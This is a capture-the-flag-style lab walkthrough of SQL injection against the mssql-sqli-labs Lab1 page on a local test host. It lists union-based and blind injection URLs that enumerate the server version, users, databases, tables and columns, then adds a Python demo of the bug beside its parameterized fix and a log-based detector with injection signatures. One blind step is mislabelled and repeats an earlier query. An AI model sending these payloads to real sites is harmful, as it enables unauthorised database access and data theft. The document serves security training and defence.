Environment
mssql-sqli-labs deployed on Windows Server 2008 (win2008)
Target: Lab1, determined to be a single-quote (') injection
Steps
1. order by 3 confirms there are 3 columns
2.
http://192.168.75.133/less-1.asp?id=1' union select '1','2','3' --
In MSSQL a UNION cannot mix numeric and string values in the same column (the types must match), which is why every placeholder is quoted as a string.
3. Query the version
http://192.168.75.133/less-1.asp?id=1' union select '1','2',@@version --
4. Get the current database name (db_name())
http://192.168.75.133/less-1.asp?id=1' union select '1','2',db_name()--
5. Get the current user name
http://192.168.75.133/less-1.asp?id=1' union select '1','2',user --
http://192.168.75.133/less-1.asp?id=1' union select '1','2',system_user --
http://192.168.75.133/less-1.asp?id=1' union select '1','2',current_user --
Get server host information
http://192.168.75.133/less-1.asp?id=1' union select '1','2',@@servername --
6. Enumerate database names
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select count(schema_name) from information_schema.schemata) --
Then dump them one at a time, excluding the names already seen so that each `top 1` returns a new one:
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 schema_name from information_schema.schemata where schema_name not in ('dbo','db_accessadmin','db_backupoperator','db_datareader','db_datawriter','db_ddladmin','db_denydatareader','db_denydatawriter','db_owner','db_securityadmin','guest','INFORMATION_SCHEMA','sys')) --
7. Find table names
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 table_name from information_schema.tables ) --
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 table_name from information_schema.tables where table_name not in ('emails') ) --
Repeat, excluding each name already found, to dump all four tables:
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 table_name from information_schema.tables where table_name not in ('emails','uagents','referers','users') ) --
8. Dump the columns of a table
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 column_name from information_schema.columns where table_name='emails') --
Repeat, excluding each column already found, to dump the remaining fields:
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 column_name from information_schema.columns where column_name not in ('id','email_id','uagent','ip_address','username','referer','password')) --
9. Using the emails table as an example
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 id from emails) --
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 email_id from emails ) --
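Steps 1 to 9 above all work because Lab1 pastes the id parameter straight into the SQL text. The following is an added example, not code from the mssql-sqli-labs project: it reproduces that concatenation bug beside its hardened form. sqlite3 stands in for the lab's MSSQL backend, and the users table, its rows and the column layout are constructed to match the three columns found with order by 3.

```python
import sqlite3

# Added example (not part of the original walkthrough). sqlite3 stands in for the
# lab's MSSQL backend; the table and its rows are constructed sample data laid out
# to match Lab1's three columns.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
CONN.executemany(
    "INSERT INTO users VALUES (?, ?, ?)",
    [(1, "alice", "s3cret"), (2, "bob", "hunter2")],  # constructed sample rows
)


def vulnerable_lookup(user_id: str) -> list:
    """Mirrors Lab1: the id parameter is concatenated straight into the SQL text,
    so a quote in the input closes the literal and the rest becomes SQL."""
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}'"
    return CONN.execute(sql).fetchall()


def safe_lookup(user_id: str) -> list:
    """Hardened form: allow-list the input shape, then bind it as a parameter.
    Quotes, UNION or comment markers inside the value are data, never SQL."""
    if not user_id.isdigit():  # the id is expected to be a plain non-negative integer
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, username, password FROM users WHERE id=?"
    return CONN.execute(sql, (int(user_id),)).fetchall()


def injection_blocked(user_id: str) -> bool:
    """True when the hardened lookup rejects the input instead of running it."""
    try:
        safe_lookup(user_id)
    except ValueError:
        return True
    return False


# Same shape as the walkthrough's step 2: three quoted placeholders and a comment.
PAYLOAD = "1' union select '1','2','leaked' --"

if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup(PAYLOAD))   # the union row comes back
    print("blocked:", injection_blocked(PAYLOAD))      # True
```

Parameter binding alone is the fix; the isdigit() check on top of it is defense in depth that also gives a clean place to log rejected input, which is what turns the union probes in the steps above into a visible event.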
Blind injection: querying the version
1. Determine the length of the @@version string
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 email_id from emails ) --
2. Extract one character at a time and compare its ASCII value
http://192.168.75.133/less-1.asp?id=1' and ascii(substring(@@version,1,1)) > 76 --
This narrows it down to 77, i.e. 'M'; repeat the same comparison for each following position. A quicker alternative is a union query that returns a character's ASCII value directly:
http://192.168.75.133/less-1.asp?id=1' union select '1','2',ascii(substring(@@version,1,1)) --
The version string finally recovered:
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor)
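Both phases of this walkthrough leave a distinctive trace in the web server log: the union phase carries `union select` plus metadata names such as information_schema, @@version or db_name(), and the blind phase is a burst of `ascii(substring(` requests from one client that differ only in position and comparison value. The following is an added detection example, not code from the lab; the IIS-style W3C log lines are constructed (field order assumed: date, time, s-ip, method, uri-stem, uri-query, port, username, c-ip, user-agent, status), and the threshold of three blind probes per client is an assumption to tune for your own traffic.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Added example (not part of the original walkthrough). Constructed IIS-style W3C
# log lines; the query string is stored URL-encoded as received, so it is decoded
# before matching. Field order is assumed as described in the lead-in.
SAMPLE_LOG = """\
2024-01-01 10:00:01 192.168.75.133 GET /less-1.asp id=1 80 - 192.0.2.20 Mozilla 200
2024-01-01 10:00:02 192.168.75.133 GET /less-1.asp id=1%27+union+select+%271%27,%272%27,@@version+-- 80 - 192.0.2.10 Mozilla 200
2024-01-01 10:00:03 192.168.75.133 GET /less-1.asp id=1%27+union+select+%271%27,%272%27,(select+top+1+table_name+from+information_schema.tables)+-- 80 - 192.0.2.10 Mozilla 200
2024-01-01 10:00:04 192.168.75.133 GET /less-1.asp id=1%27+and+ascii(substring(@@version,1,1))+%3E+76+-- 80 - 192.0.2.10 Mozilla 200
2024-01-01 10:00:05 192.168.75.133 GET /less-1.asp id=1%27+and+ascii(substring(@@version,1,1))+%3E+78+-- 80 - 192.0.2.10 Mozilla 500
2024-01-01 10:00:06 192.168.75.133 GET /less-1.asp id=1%27+and+ascii(substring(@@version,2,1))+%3E+100+-- 80 - 192.0.2.10 Mozilla 200
2024-01-01 10:00:07 192.168.75.133 GET /less-1.asp id=2 80 - 192.0.2.20 Mozilla 200
"""

# Signatures taken from the payload shapes used in the walkthrough above.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
METADATA_RE = re.compile(r"information_schema\.|@@version|@@servername|db_name\s*\(|\bsystem_user\b")
BLIND_RE = re.compile(r"ascii\s*\(\s*substring\s*\(")
BLIND_THRESHOLD = 3  # assumed: this many character probes from one client is a sequence


def parse_line(line: str):
    """Split one W3C line into the fields the detector needs; None if malformed."""
    fields = line.split()
    if len(fields) < 11:
        return None
    return {
        "client": fields[8],
        "uri": fields[4],
        "query": unquote_plus(fields[5]).lower(),  # decode %27 / + before matching
        "status": fields[10],
    }


def classify(query: str) -> set:
    """Tag a decoded query string with the injection phases it resembles."""
    tags = set()
    if UNION_RE.search(query):
        tags.add("union")
    if METADATA_RE.search(query):
        tags.add("metadata")
    if BLIND_RE.search(query):
        tags.add("blind")
    return tags


def analyze(log_text: str) -> dict:
    """Per-client counts of each signature plus a flag for the two patterns above."""
    per_client = defaultdict(lambda: {"union": 0, "metadata": 0, "blind": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_client[rec["client"]]  # create the entry even for benign traffic
        for tag in classify(rec["query"]):
            stats[tag] += 1
    for stats in per_client.values():
        # One union request with metadata is already a finding; blind probing is
        # only meaningful as a series, hence the threshold.
        stats["flagged"] = stats["union"] > 0 or stats["blind"] >= BLIND_THRESHOLD
    return dict(per_client)


if __name__ == "__main__":
    for client, stats in analyze(SAMPLE_LOG).items():
        print(client, stats)
```

Counting per client rather than per request is what separates the blind phase from a single odd-looking URL: the individual probes look alike, but the sequence of position and comparison values from one address is the signal. Decoding the query string before matching matters because the same payload arrives as `%27`, `+` and `%3E` in the raw log.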